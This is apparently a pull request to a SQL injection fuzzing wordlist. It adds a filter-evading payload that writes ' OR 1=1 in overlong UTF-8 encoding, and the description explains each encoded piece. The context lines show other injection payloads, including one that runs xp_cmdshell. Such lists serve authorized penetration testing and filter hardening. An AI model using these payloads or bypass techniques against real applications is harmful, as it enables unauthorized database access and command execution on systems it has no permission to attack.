### PR TITLE
Update Generic-SQLi.txt

### DIFF
--- a/Fuzzing/SQLi/Generic-SQLi.txt
+++ b/Fuzzing/SQLi/Generic-SQLi.txt
@@ -265,3 +265,4 @@ t'exec master..xp_cmdshell 'nslookup www.google.com'--
 ' or ''='
 ' or 3=3
  or 3=3 --
+%C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11


### PR DESCRIPTION
Using overlong utf8 encoding or illegal characters to bypass filters which works on servers or web applications that decode overlong utf8 characters or strip out illegal characters. This is the equivalent of `' OR 1=1`

`'` = `%C0%80%27`
`space` = `%C0%80%C0%80`
`+` = `%C0%8F%2B`
`OR` = `%C0%80O%C0%82R`
`=` = `%C0%80%C0%A1`